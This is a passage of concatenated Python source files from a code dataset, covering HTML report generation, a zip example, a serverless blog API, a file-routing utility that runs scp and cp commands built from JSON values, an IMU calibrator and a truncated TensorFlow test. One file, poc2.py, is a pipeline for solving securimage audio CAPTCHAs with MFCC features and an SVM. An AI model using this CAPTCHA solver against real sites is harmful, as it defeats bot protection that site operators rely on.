and 'csv')\n\n param_args['columns'] - a list of dictionaries that defines the\n column structure for the table (required). The order of\n the columns from left to right is depicted by the index\n of the column dictionary in the list. Each dictionary\n in the list has the following keys and values:\n 'name' - a string for the column name (required)\n 'total' - a boolean for whether the column should be\n totaled (required)\n 'attr' - a dictionary that has key value pairs for\n optional tag attributes (optional). Ex:\n 'attr': {'class': 'offsets'}\n 'td_class' - a String to assign as a class name to\n the table data tags under the column. Each\n table data tag under the column will have a class\n attribute assigned to 'td_class' value (optional)\n\n param_args['total'] - a boolean value where if True a constant\n total row will be placed at the bottom of the table that sums\n the columns (required)\n\n returns - a string that represents an html table\n \"\"\"\n LOGGER.debug('Building Table Structure')\n # Initialize an intermediate dictionary which will hold the physical data\n # elements of the table\n data_dict = {}\n\n # Initialize the final dictionary which will have the data of the table as\n # well as parameters needed to build up the html table\n table_dict = {}\n\n # Get the data type of the input being passed in so that it can properly be\n # pre-processed\n data_type = param_args['data_type']\n\n # Get a handle on the input data being passed in, whether it a URI to a\n # shapefile / csv file or a list of dictionaries\n input_data = param_args['data']\n\n # Depending on the type of input being passed in, pre-process it\n # accordingly\n if data_type == 'shapefile':\n key = param_args['key']\n data_dict = extract_datasource_table_by_key(\n input_data, key)\n # Convert the data_dict to a list of dictionaries where each dictionary\n # in the list represents a row of the table\n data_list = data_dict_to_list(data_dict)\n elif data_type == 'csv':\n key = param_args['key']\n data_dict = utils.build_lookup_from_csv(input_data, key)\n # Convert the data_dict to a list of dictionaries where each dictionary\n # in the list represents a row of the table\n data_list = data_dict_to_list(data_dict)\n else:\n data_list = input_data\n\n #LOGGER.debug('Data Collected from Input Source: %s', data_list)\n LOGGER.debug('Data Collected from Input Source')\n\n # Add the columns data to the final dictionary that is to be passed\n # off to the table generator\n table_dict['cols'] = param_args['columns']\n\n # Add the properly formatted row data to the final dictionary that is\n # to be passed to the table generator\n table_dict['rows'] = data_list\n\n # If a totals row is present, add it to the final dictionary\n if 'total' in param_args:\n table_dict['total'] = param_args['total']\n\n # If table attributes were passed in check to see if the 'sortable' class\n # needs to be added to that list\n if 'attributes' in param_args:\n table_dict['attributes'] = param_args['attributes']\n if param_args['sortable']:\n try:\n class_list = table_dict['attributes']['class'] + ' sortable'\n table_dict['attributes']['class'] = class_list\n except KeyError:\n table_dict['attributes']['class'] = 'sortable'\n else:\n # Attributes were not passed in, however if sortable is True\n # create attributes key and dictionary to pass in to table\n # handler\n if param_args['sortable']:\n table_dict['attributes'] = {'class': 'sortable'}\n\n # If a checkbox column is wanted pass in the table dictionary\n if 'checkbox' in param_args and param_args['checkbox']:\n table_dict['checkbox'] = True\n if 'checkbox_pos' in param_args:\n table_dict['checkbox_pos'] = param_args['checkbox_pos']\n\n LOGGER.debug('Calling table_generator')\n # Call generate table passing in the final dictionary and attribute\n # dictionary. Return the generate string\n return table_generator.generate_table(table_dict)\n\n\ndef extract_datasource_table_by_key(datasource_uri, key_field):\n \"\"\"Return vector attribute table of first layer as dictionary.\n\n Create a dictionary lookup table of the features in the attribute table\n of the datasource referenced by datasource_uri.\n\n Args:\n datasource_uri (string): a uri to an OGR datasource\n key_field: a field in datasource_uri that refers to a key value\n for each row such as a polygon id.\n\n Returns:\n attribute_dictionary (dict): returns a dictionary of the\n form {key_field_0: {field_0: value0, field_1: value1}...}\n \"\"\"\n # Pull apart the datasource\n datasource = gdal.OpenEx(datasource_uri)\n layer = datasource.GetLayer()\n layer_def = layer.GetLayerDefn()\n\n # Build up a list of field names for the datasource table\n field_names = []\n for field_id in range(layer_def.GetFieldCount()):\n field_def = layer_def.GetFieldDefn(field_id)\n field_names.append(field_def.GetName())\n\n # Loop through each feature and build up the dictionary representing the\n # attribute table\n attribute_dictionary = {}\n for feature in layer:\n feature_fields = {}\n for field_name in field_names:\n feature_fields[field_name] = feature.GetField(field_name)\n key_value = feature.GetField(key_field)\n attribute_dictionary[key_value] = feature_fields\n\n # Explictly clean up the layers so the files close\n layer = None\n datasource = None\n return attribute_dictionary\n\n\ndef data_dict_to_list(data_dict):\n \"\"\"Abstract out inner dictionaries from data_dict into a list, where\n the inner dictionaries are added to the list in the order of\n their sorted keys\n\n data_dict - a dictionary with unique keys pointing to dictionaries.\n Could be empty (required)\n\n returns - a list of dictionaries, or empty list if data_dict is empty\"\"\"\n\n data_list = []\n data_keys = list(data_dict)\n data_keys.sort()\n for key in data_keys:\n data = data_dict[key]\n data_list.append(data)\n\n return data_list\n\n\ndef add_text_element(param_args):\n \"\"\"Generates a string that represents a html text block. The input string\n should be wrapped in proper html tags\n\n param_args - a dictionary with the following arguments:\n\n param_args['text'] - a string\n\n returns - a string\n \"\"\"\n\n return param_args['text']\n\n\ndef add_head_element(param_args):\n \"\"\"Generates a string that represents a valid element in the head section\n of an html file. Currently handles 'style' and 'script' elements,\n where both the script and style are locally embedded\n\n param_args - a dictionary that holds the following arguments:\n\n param_args['format'] - a string representing the type of element to\n be added. Currently : 'script', 'style' (required)\n\n param_args['data_src'] - a string URI path for the external source\n of the element OR a String representing the html\n (DO NOT include html tags, tags are automatically generated).\n If a URI the file is read in as a String. (required)\n\n param_args['input_type'] - 'Text' or 'File'. Determines how the\n input from 'data_src' is handled (required)\n\n 'attributes' - a dictionary that has key value pairs for\n optional tag attributes (optional). Ex:\n 'attributes': {'class': 'offsets'}\n\n returns - a string representation of the html head element\"\"\"\n\n LOGGER.info('Preparing to generate head element as String')\n\n # Get the type of element to add\n form = param_args['format']\n # Get a handle on the data whether it be a String or URI\n src = param_args['data_src']\n # Get the input type of the data, 'File' or 'Text'\n input_type = param_args['input_type']\n if input_type == 'File':\n # Read in file and save as string. Using latin1 to decode, seems to\n # work on the current javascript / css files\n head_file = codecs.open(src, 'rb', 'latin1')\n file_str = head_file.read()\n else:\n file_str = src\n\n attr = ''\n if 'attributes' in param_args:\n for key, val in param_args['attributes'].items():\n attr += '%s=\"%s\" ' % (key, val)\n\n # List of regular expression strings to search against\n reg_list = [r'', r'']\n\n # Iterate over the String object to make sure there are no conflicting html\n # tags\n for exp in reg_list:\n if re.search(exp, file_str) != None:\n raise Exception('The following html tag was found in header'\n ' string : %s. Please do not place any html tags in'\n ' the header elements' % exp)\n\n if form == 'style':\n html_str = \"\"\"\"\"\" % (attr, file_str)\n elif form == 'script':\n html_str = \"\"\"\"\"\" % (attr, file_str)\n elif form == 'json':\n html_str = \"\"\"\"\"\" % (attr, file_str)\n else:\n raise Exception('Currently this type of head element is not supported'\n ' : %s' % form)\n\n return html_str\n","sub_path":"src/natcap/invest/reporting/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":22481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"536820287","text":"# import os\nimport shutil\nfrom os import path\n\n\ndef main():\n # make a duplicate of an existing file\n if path.exists(\"newfile.txt\"):\n # get the path to the file in the current directoy\n src = path.realpath(\"newfile.txt\")\n\n # Separate the path part from the filename\n head, tail = path.split(src)\n print\n \"path : \" + head\n print\n \"tail : \" + tail\n\n # now let's put things into a ZIP archive\n root_dir, tail = path.split(src)\n\n shutil.make_archive(\"archive_test\", \"zip\", root_dir)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python_Up_And_Running/03 - Working with Files/06_1_Zip.py","file_name":"06_1_Zip.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"170390128","text":"import json\nimport random\nimport os\n\nimport numpy as np\nimport scipy.io.wavfile\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom collectTrainData2 import collectTrainData\nfrom getPotentialSpeakLocation import getPotentialSpeakLocation\nfrom FeatureExtraction import Rasta,Mfcc,Raw\nfrom MLAlgo import KNN, SVM, NeuralNetFeatures, NeuralNetRaw\n\n\ndef runPipeline(dir_train, dir_test, left, right, mlModel, featureExtraction, applyPca):\n #1.collect the raw train data\n print(\"Collect raw train data from %s...\"%(dir_train))\n X_train,y_train,rate = collectTrainData(dir_train, left, right)\n\n #2. feature extraction\n print(\"Apply feature extraction to the raw data...\")\n X_train = featureExtraction(X_train, rate)\n\n pca = PCA(n_components = 0.95)\n scaler = MinMaxScaler()\n\n #******PCA (optional)\n if applyPca:\n print(\"Apply PCA to reduce the dimensionality of the data to 95%...\")\n # X_train = scaler.fit_transform(X_train)\n pca.fit(X_train)\n X_train = pca.transform(X_train)\n\n #3. train the model\n print(\"Train the model...\")\n mlModel.train(X_train, y_train)\n\n #4. solve each test data\n print(\"Solve each test input from %s:\"%dir_test)\n prefixes = list(set([x.split('.')[0] for x in os.listdir(DIR_TEST)])) #list all files names\n prefixes = sorted(prefixes)\n count = 0\n count_34th = 0\n indiv_count = 0\n for i in range(len(prefixes)):\n prefix = prefixes[i]\n #4.1. Read the file\n wavFile = os.path.join(DIR_TEST, prefix + \".wav\")\n outFile = os.path.join(DIR_TEST, prefix + \".txt\")\n #read/parse .wav file and .txt file\n rate, data = scipy.io.wavfile.read(wavFile)\n data = np.asarray([0] * LEFT + list(data) + [0] * RIGHT)\n output = json.load(open(outFile))\n #4.2. Get potential spoken locs\n locs = getPotentialSpeakLocation(data, rate, LEFT, RIGHT, 4)\n #Get the expectedLocs from the test file\n expectedLocs = map(int, output[\"offsets\"][1:-1].split(','))\n expectedLocs = [(x + LEFT) for x in expectedLocs]\n print(\"======Test %d:\"%(i))\n print(\"Actual spoken locs = \" + str(locs))\n print(\"Expected spoken locs = \" + str(expectedLocs))\n #4.3. Build the answer\n captchas = \"\"\n signals = []\n #Iterate through each loc\n for loc in locs:\n sta = loc - LEFT\n fin = loc + RIGHT\n signals.append(data[sta:fin])\n signals = np.array(signals)\n #feature extraction\n signals = featureExtraction(signals, rate)\n #******PCA (optional)\n if applyPca:\n # signals = scaler.fit_transform(signals)\n signals = pca.transform(signals)\n #predict the output for each individual token\n predictedVals = mlModel.predict(signals)\n for c in predictedVals:\n captchas += str(c) if c < 10 else chr(ord('a') + c - 10)\n if captchas == output[\"code\"]:\n count += 1\n cur_cnt = 0\n for i in range(4):\n if captchas[i] == output[\"code\"][i]:\n cur_cnt += 1\n indiv_count += 1\n if cur_cnt == 3:\n count_34th += 1\n print(\"Actual output = %s | Expected output = %s\"%(captchas, output[\"code\"]))\n\n print(\"Accuracy = %.4f\"%(count/len(prefixes)))\n print(\"3/4th Accuracy = %.4f\"%((count + count_34th)/len(prefixes)))\n print(\"Accuracy of Individual Digits = %.4f\"%((indiv_count)/(len(prefixes) * 4)))\n\n#########CONFIGURATION FOR THE PIPELINE\nif __name__ == '__main__':\n DIR_TRAIN = os.path.join(\"data\", \"securimage_all\", \"train\")\n DIR_TEST = os.path.join(\"data\", \"securimage_all\", \"test\")\n LEFT = 2500\n RIGHT = 2500\n MLMODEL = SVM()\n FEATURE_EXTRATION = Mfcc(flatten=True)\n runPipeline(DIR_TRAIN, DIR_TEST, LEFT, RIGHT, MLMODEL, FEATURE_EXTRATION, applyPca=True)\n","sub_path":"poc2.py","file_name":"poc2.py","file_ext":"py","file_size_in_byte":3956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"369954241","text":"# -*- coding: utf8 -*-\nimport json\n\ntestArticleInfo=[\n {\"id\":1,\"category\":\"blog\",\"title\":\"hello world\",\"content\":\"first blog! hello world!\",\"time\":\"2017-12-05 13:45\"},\n {\"id\":2,\"category\":\"blog\",\"title\":\"record info\",\"content\":\"record work and study!\",\"time\":\"2017-12-06 08:22\"},\n {\"id\":3,\"category\":\"python\",\"title\":\"python study\",\"content\":\"python study for 2.7\",\"time\":\"2017-12-06 18:32\"},\n]\n\ndef main_handler(event,content):\n if \"requestContext\" not in event.keys():\n return {\"errorCode\":410,\"errorMsg\":\"event is not come from api gateway\"}\n if event[\"requestContext\"][\"path\"] != \"/article/{articleId}\" and event[\"requestContext\"][\"path\"] != \"/article\":\n return {\"errorCode\":411,\"errorMsg\":\"request is not from setting api path\"}\n if event[\"requestContext\"][\"path\"] == \"/article\" and event[\"requestContext\"][\"httpMethod\"] == \"GET\": # Get article list\n retList = []\n for article in testArticleInfo:\n retItem = {}\n retItem[\"id\"] = article[\"id\"]\n retItem[\"category\"] = article[\"category\"]\n retItem[\"title\"] = article[\"title\"]\n retItem[\"time\"] = article[\"time\"]\n retList.append(retItem)\n return retList\n if event[\"requestContext\"][\"path\"] == \"/article/{articleId}\" and event[\"requestContext\"][\"httpMethod\"] == \"GET\": # Get content\n articleId = int(event[\"pathParameters\"][\"articleId\"])\n for article in testArticleInfo:\n if article[\"id\"] == articleId:\n return article\n return {\"errorCode\":412,\"errorMsg\":\"article is not found\"}\n return {\"errorCode\":413,\"errorMsg\":\"request is not correctly execute\"}\n","sub_path":"qcloud/blogArticle.py","file_name":"blogArticle.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"510836731","text":"import json\nimport yaml\nimport re\nimport logging\nimport os\nimport time\nimport hashlib\nfrom itertools import cycle\n\n\n# https://stackoverflow.com/questions/1131220/get-md5-hash-of-big-files-in-python\ndef md5_checksum(f, block_size=2**20):\n md5 = hashlib.md5()\n while True:\n data = f.read(block_size)\n if not data:\n break\n md5.update(data)\n return md5.hexdigest()\n\n\ndef find_key(key, var):\n \"\"\"Finds all occurrences of a key in a nested dictionary, useful for gobbling up\n stuff from json files.\n\n All credit due to https://stackoverflow.com/questions/9807634/\\\n find-all-occurrences-of-a-key-in-nested-python-dictionaries-and-lists\n \"\"\"\n if hasattr(var, 'items'):\n for k, v in var.items():\n if k == key:\n yield v\n if isinstance(v, dict):\n for result in find_key(key, v):\n yield result\n elif isinstance(v, list):\n for d in v:\n for result in find_key(key, d):\n yield result\n\n\ndef read_config(file, destination=None, user=None, host=None, cmd_host=None, copy_protocol=None):\n \"\"\"Simple yaml reader to parse config files\n\n Args:\n file: the yaml file to read the configuration from\n Returns:\n config: a dictionary with the j keys, the path variable they map to, and other bells and whistles...\n\n \"\"\"\n with open(file) as config_yaml:\n base_yaml = yaml.safe_load(config_yaml)\n\n # with config loaded, make sure we have the keys that we need\n\n base_config = {\n 'keys': [],\n 'map': [],\n 'default': [],\n 'required_files': [],\n 'path': None,\n 'destination': destination,\n 'command': {\n 'exts': [],\n 'run': None\n }\n }\n\n router_config = {\n 'key': [],\n 'files': [],\n 'filter': None,\n 'invert': None,\n 'lowercase': None,\n 'exact': None\n }\n\n remote_config = {\n 'user': user,\n 'host': host,\n 'copy_protocol': copy_protocol,\n 'cmd_host': cmd_host,\n }\n\n if 'dassort' in base_yaml.keys() and 'remote' in base_yaml.keys():\n tree_yaml = base_yaml['dassort']\n map_json = tree_yaml['json']\n base_config = merge_dicts(base_config, map_json)\n base_config = merge_dicts(base_config, tree_yaml)\n remote_yaml = base_yaml['remote']\n remote_config = merge_dicts(remote_config, remote_yaml)\n router_config = None\n elif 'dassort' in base_yaml.keys():\n tree_yaml = base_yaml['dassort']\n map_json = tree_yaml['json']\n base_config = merge_dicts(base_config, map_json)\n base_config = merge_dicts(base_config, tree_yaml)\n remote_config = None\n router_config = None\n elif 'router' in base_yaml.keys():\n tree_yaml = base_yaml['router']\n router_config = merge_dicts(router_config, tree_yaml)\n # all router items should be iterables\n for k, v in router_config.items():\n if type(v) is not list:\n router_config[k] = [v]\n base_config = None\n remote_config = None\n else:\n base_config = None\n remote_config = None\n router_config = None\n\n # reformat base configuration\n if base_config is not None:\n base_config = {\n 'keys': base_config['keys'],\n 'map': base_config['map'],\n 'default': base_config['default'],\n 'required_files': base_config['required_files'],\n 'value': [],\n 'path': {\n 'path_string': base_config['path'],\n 're': {'root': base_config['destination']}\n },\n 'command': base_config['command'],\n }\n\n return base_config, remote_config, router_config\n\n\ndef merge_dicts(dict1, dict2):\n \"\"\"Merge dictionary 2 values into dictionary 1, contingent on dictionary 1 containing\n a given key.\n\n Args:\n dict1: source dictionary\n dict2: merge dictionary\n Returns:\n merge_dict: dict2 merged into dict1\n \"\"\"\n merge_dict = dict1\n\n for key, value in dict1.items():\n if key in dict2:\n merge_dict[key] = dict2[key]\n\n return merge_dict\n\n\ndef build_path(key_dict, path_string):\n \"\"\"Takes our path string and replaces variables surrounded by braces and prefixed by $\n with a particular value in a key dictionary\n\n Args:\n key_dict: dictionary where each key, value pair corresponds to a variable and its value\n path_string: path string that specifies how to build our target path_string\n Returns:\n path_string: new path to use\n\n For example, if the path_string is ${root}/${subject} and key_dict is {'root':'cooldrive','subject':'15781'}\n the path_string is converted to cooldrive/15781\n \"\"\"\n for key, value in key_dict.items():\n path_string = re.sub('\\$\\{' + key + '\\}', value, path_string)\n\n return path_string\n\n\ndef get_listing_manifest(proc):\n \"\"\"Gets the files to ship off with a corresponding json file. If the json file lives in a sub-folder,\n all files in the folder become part of the manifest, if it does not, then all files with a matching filename\n become part of the manifest.\n\n Args:\n proc: File or directory to process\n Returns:\n listing_manifest: Files to process with json file\n json_file: Json file associated with the manifest\n\n \"\"\"\n # json is always LAST since it may trigger other copies...\n # https://stackoverflow.com/questions/44214910/select-the-first-n-smallest-files-from-a-folder\n if os.path.isdir(proc):\n isdir = True\n # sort the listing by size, we want big files in the back\n tmp_listing = os.listdir(proc)\n tmp_listing = sorted(tmp_listing, key=lambda x: os.path.getsize(os.path.join(proc, x)))\n tmp_json = [os.path.join(proc, f)\n for f in tmp_listing\n if f.endswith('.json')]\n json_file = tmp_json[0]\n listing_manifest = [os.path.join(proc, f)\n for f in tmp_listing\n if os.path.isfile(os.path.join(proc, f))\n and not f.endswith('.json')]\n [listing_manifest.append(_) for _ in tmp_json]\n else:\n isdir = False\n json_file = proc\n filename = os.path.splitext(os.path.basename(proc))[0]\n dirname = os.path.dirname(proc)\n listing_manifest = [os.path.join(dirname, f)\n for f in os.listdir(dirname)\n if f.startswith(filename)\n and not f.endswith('.json')]\n listing_manifest.append(json_file)\n\n return listing_manifest, json_file\n\n\ndef parse_router(router, dirs, files):\n\n router_status = []\n router_re = []\n for filter, exact in zip(router['filter'], cycle(router['exact'])):\n if exact:\n router_re.append(r'\\b{}\\b'.format(filter))\n else:\n router_re.append(r'{}'.format(filter))\n\n # first search directories\n for jsons in dirs:\n js_data = []\n for js in jsons:\n with open(js, 'r') as j:\n js_data.append(json.load(j))\n dir_status = []\n for filter, key, lowercase, invert in zip(router_re,\n cycle(router['key']),\n cycle(router['lowercase']),\n cycle(router['invert'])):\n if lowercase:\n hits = [re.search(filter, j[key], re.IGNORECASE) is not None for j in js_data]\n else:\n hits = [re.search(filter, j[key]) is not None for j in js_data]\n\n if invert:\n dir_status.append(not any(hits))\n else:\n dir_status.append(any(hits))\n\n try:\n router_status.append(dir_status.index(True))\n except ValueError:\n router_status.append(None)\n\n # then search files\n for js in files:\n\n with open(js, 'r') as j:\n js_data = json.load(j)\n\n if js_data is None:\n continue\n\n file_status = []\n for filter, key, lowercase, invert in zip(router_re,\n cycle(router['key']),\n cycle(router['lowercase']),\n cycle(router['invert'])):\n\n if lowercase:\n hit = re.search(filter, js_data[key], re.IGNORECASE)\n else:\n hit = re.search(filter, js_data[key])\n\n if invert:\n hit = not hit\n\n file_status.append(hit)\n try:\n router_status.append(file_status.index(True))\n except ValueError:\n router_status.append(None)\n\n return router_status\n\n\ndef proc_loop(listing, base_dict, dry_run, delete, remote_options):\n \"\"\"Main processing loop\n\n \"\"\"\n proc_count = 0\n for proc in listing:\n\n use_dict = base_dict\n\n logging.info('Processing ' + proc)\n sz = os.path.getsize(proc)\n\n # loop through manifest, make sure the files are not growing...\n\n listing_manifest, json_file = get_listing_manifest(proc=proc)\n\n # changed from <= 1 to < 1 to account for metadata.json getting orphaned...\n if len(listing_manifest) < 1:\n logging.info(\n 'Manifest empty, continuing...(maybe files still copying?)')\n continue\n\n logging.info('Getting file sizes for manifest')\n listing_sz = {f: os.path.getsize(f) for f in listing_manifest}\n time.sleep(30)\n listing_manifest, json_file = get_listing_manifest(proc=proc)\n logging.info('Checking file sizes again')\n listing_sz2 = {f: os.path.getsize(f) for f in listing_manifest}\n\n if listing_sz != listing_sz2:\n logging.info(\n 'A file size changed or a new file was added, continuing...')\n continue\n\n missing_files = False\n\n if base_dict['required_files'] is not None and len(base_dict['required_files']) > 0:\n basenames = [os.path.basename(_) for _ in listing_manifest]\n for required_file in base_dict['required_files']:\n if required_file not in basenames:\n logging.info('Could not find ' + required_file)\n missing_files = True\n\n if missing_files:\n logging.info('File missing, continuing...')\n continue\n\n logging.info('Found json file ' + json_file)\n\n with open(json_file) as open_file:\n dict_json = json.load(open_file)\n\n if 'destination' in dict_json:\n use_dict['path']['re']['root'] = dict_json['destination']\n\n # if it's a directory the manifest is the contents of the directory, if it's not the manifest\n # simply matches filenames\n\n logging.info('Manifest [' + ','.join(listing_manifest) + ']')\n generators = []\n\n for m, d in zip(use_dict['map'], use_dict['default']):\n use_dict['path']['re'][m] = d\n\n for k, v in zip(use_dict['keys'], cycle(use_dict['map'])):\n generators = find_key(k, dict_json)\n use_dict['path']['re'][v] = next(\n generators, use_dict['path']['re'][v])\n\n # sub folder is a special key to copy over the appropriate sub-folder\n\n if os.path.isdir(proc):\n use_dict['path']['re']['sub_folder'] = os.path.basename(\n os.path.normpath(proc)) + '/'\n else:\n use_dict['path']['re']['sub_folder'] = ''\n\n # build a path\n new_path = build_path(\n use_dict['path']['re'], use_dict['path']['path_string'])\n # check for command triggers\n\n logging.info('Sending manifest to ' + new_path)\n\n # aiight dawg, one trigger per manifest?\n\n for f in listing_manifest:\n if remote_options['copy_protocol'] == 'scp':\n # dir check\n local_copy = False\n dir_cmd = \"ssh %s@%s 'mkdir -p \\\"%s\\\"'\" % (\n remote_options['user'], remote_options['host'], new_path)\n cp_cmd = \"scp \\\"%s\\\" %s@%s:'\\\"%s\\\"'\" % (\n f, remote_options['user'], remote_options['host'], new_path)\n elif remote_options['copy_protocol'] == 'nocopy':\n local_copy = False\n dir_cmd = ''\n cp_cmd = ''\n elif remote_options['copy_protocol'] == 'rsync':\n local_copy = False\n raise NotImplementedError\n elif remote_options['copy_protocol'] == 'cp':\n local_copy = True\n dir_cmd = \"mkdir -p \\\"%s\\\"\" % (new_path)\n cp_cmd = \"cp \\\"%s\\\" \\\"%s\\\"\" % (f, new_path)\n else:\n raise NotImplementedError\n\n logging.info('Chk command: ' + dir_cmd)\n logging.info('Copy command: ' + cp_cmd)\n\n if not dry_run:\n status = os.system(dir_cmd)\n\n if status == 0:\n logging.info(\n 'Directory creation/check succesful, copying...')\n status = os.system(cp_cmd)\n\n if local_copy:\n # check md5\n logging.info('Checking file integrity...')\n with open(f, 'rb') as f_check:\n md5_original = md5_checksum(f_check)\n new_file = os.path.join(new_path, os.path.basename(f))\n with open(new_file, 'rb') as f_check:\n md5_copy = md5_checksum(f_check)\n md5checksum = md5_original == md5_copy\n logging.info('MD5checksum: ' + str(md5checksum))\n status = status & (not md5checksum)\n\n if status == 0 and delete:\n logging.info('Copy succeeded, deleting file')\n proc_count += 1\n os.remove(os.path.join(new_path, f))\n elif status == 0:\n logging.info('Copy SUCCESS, continuing')\n proc_count += 1\n else:\n logging.info('Copy FAILED, continuing')\n continue\n elif dry_run and delete:\n logging.info('Would delete: ' + os.path.join(new_path, f))\n\n issue_options = {\n 'user': '',\n 'host': '',\n 'cmd_host': '',\n 'path': ''\n }\n\n for ext, cmd in zip(use_dict['command']['exts'], cycle(use_dict['command']['run'])):\n triggers = [f for f in listing_manifest if f.endswith(ext)]\n if triggers and not dry_run and not delete:\n raise NameError(\n \"Delete option must be turned on, otherwise triggers will repeat\")\n elif triggers and remote_options['copy_protocol'] == 'nocopy':\n logging.info('nocopy, doing nothing')\n elif triggers and not dry_run:\n issue_options['path'] = os.path.join(\n new_path, os.path.basename(triggers[0]))\n issue_options = merge_dicts(issue_options, remote_options)\n issue_cmd = build_path(issue_options, cmd)\n logging.info('Issuing command ' + issue_cmd)\n status = os.system(issue_cmd)\n if status == 0:\n logging.info('Command SUCCESS')\n else:\n logging.info('Command FAIL')\n elif triggers:\n issue_options['path'] = os.path.join(\n new_path, os.path.basename(triggers[0]))\n issue_options = merge_dicts(issue_options, remote_options)\n issue_cmd = build_path(issue_options, cmd)\n logging.info('Would issue command ' + issue_cmd)\n\n return proc_count\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":16092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"157014827","text":"from .Vector3D import Vector3D\n\nclass Calibrator:\n def __init__(self, total_samples=200):\n self.accel_offset = Vector3D(0, 0, 0)\n self.gyro_offset = Vector3D(0, 0, 0)\n\n self.reference_accel = Vector3D(1, 0, 0)\n self.reference_gyro = Vector3D(0, 0, 0)\n\n self.total_samples = 200\n self.completed_samples = 0\n self.is_finished = False\n\n def filter_data(self, data):\n for d in data:\n read_time, accel, gyro = d\n if self.is_finished:\n # yield (read_time, accel, gyro-self.gyro_offset)\n yield (read_time, accel-self.accel_offset, gyro-self.gyro_offset)\n else:\n self.on_data(d)\n\n def on_data(self, data):\n _, accel, gyro, = data\n self.accel_offset += accel\n self.gyro_offset += gyro\n self.completed_samples += 1\n\n if self.completed_samples >= self.total_samples:\n self.accel_offset /= self.completed_samples\n self.gyro_offset /= self.completed_samples\n\n # calibrated = raw - error\n # error = raw - calibrated \n # calibrated = true reference\n self.accel_offset -= self.reference_accel\n self.gyro_offset -= self.reference_gyro\n\n self.is_finished = True\n","sub_path":"client/src/Calibrator.py","file_name":"Calibrator.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"358545830","text":"# Copyright 2018 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for the experimental input pipeline ops.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom tensorflow.contrib.data.python.ops import sliding\nfrom tensorflow.python.data.ops import dataset_ops\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import errors\nfrom tensorflow.python.framework import sparse_tensor\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.platform import test\n\n\nclass SlideDatasetTest(test.TestCase):\n\n def testSlideDataset(self):\n \"\"\"Test an dataset that maps a TF function across its input elements.\"\"\"\n components = (np.arange(7),\n np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],\n np.array(37.0) * np.arange(7))\n\n count = array_ops.placeholder(dtypes.int64, shape=[])\n window_size = array_ops.placeholder(dtypes.int64, shape=[])\n stride = array_ops.placeholder(dtypes.int64, shape=[])\n\n def _map_fn(x, y, z):\n return math_ops.square(x), math_ops.square(y), math_ops.square(z)\n\n # The pipeline is TensorSliceDataset -> MapDataset(square_3) ->\n # RepeatDataset(count) -> _SlideDataset(window_size, stride).\n iterator = (dataset_ops.Dataset.from_tensor_slices(components)\n .map(_map_fn)\n .repeat(count)\n .apply(sliding.sliding_window_batch(window_size, stride))\n .make_initializable_iterator())\n init_op = iterator.initializer\n get_next = iterator.get_next()\n\n self.assertEqual([[None] + list(c.shape[1:]) for c in components],\n [t.shape.as_list() for t in get_next])\n\n with self.test_session() as sess:\n # stride < window_size.\n # Slide over a finite input, where the window_size divides the\n # total number of elements.\n sess.run(init_op, feed_dict={count: 20, window_size: 14, stride: 7})\n # Same formula with convolution layer.\n num_batches = (20 * 7 - 14) // 7 + 1\n for i in range(num_batches):\n result = sess.run(get_next)\n for component, result_component in zip(components, result):\n for j in range(14):\n self.assertAllEqual(component[(i*7 + j) % 7]**2,\n result_component[j])\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n # Slide over a finite input, where the window_size does not\n # divide the total number of elements.\n sess.run(init_op, feed_dict={count: 20, window_size: 17, stride: 9})\n num_batches = (20 * 7 - 17) // 9 + 1\n for i in range(num_batches):\n result = sess.run(get_next)\n for component, result_component in zip(components, result):\n for j in range(17):\n self.assertAllEqual(component[(i*9 + j) % 7]**2,\n result_component[j])\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n # stride == window_size.\n sess.run(init_op, feed_dict={count: 20, window_size: 14, stride: 14})\n num_batches = 20 * 7 // 14\n for i in range(num_batches):\n result = sess.run(get_next)\n for component, result_component in zip(components, result):\n for j in range(14):\n self.assertAllEqual(component[(i*14 + j) % 7]**2,\n result_component[j])\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n\n # stride > window_size.\n sess.run(init_op, feed_dict={count: 20, window_size: 10, stride: 14})\n num_batches = 20 * 7 // 14\n for i in range(num_batches):\n result = sess.run(get_next)\n for component, result_component in zip(components, result):\n for j in range(10):\n self.assertAllEqual(component[(i*14 + j) % 7]**2,\n result_component[j])\n with self.assertRaises(errors.OutOfRangeError):\n sess.run(get_next)\n # Drop the last batch which is smaller than window_size.\n sess.run(init_op, feed_dict={count: 20, window_size: 14, stride: 19})\n num_batches = (20 * 7 - 7) // 19 # = 19 * 7 // 19\n for i in range(num_batches):\n result = sess.run(get_next)\n for component, result_component in zip(components, result):\n for j in range(14):\n 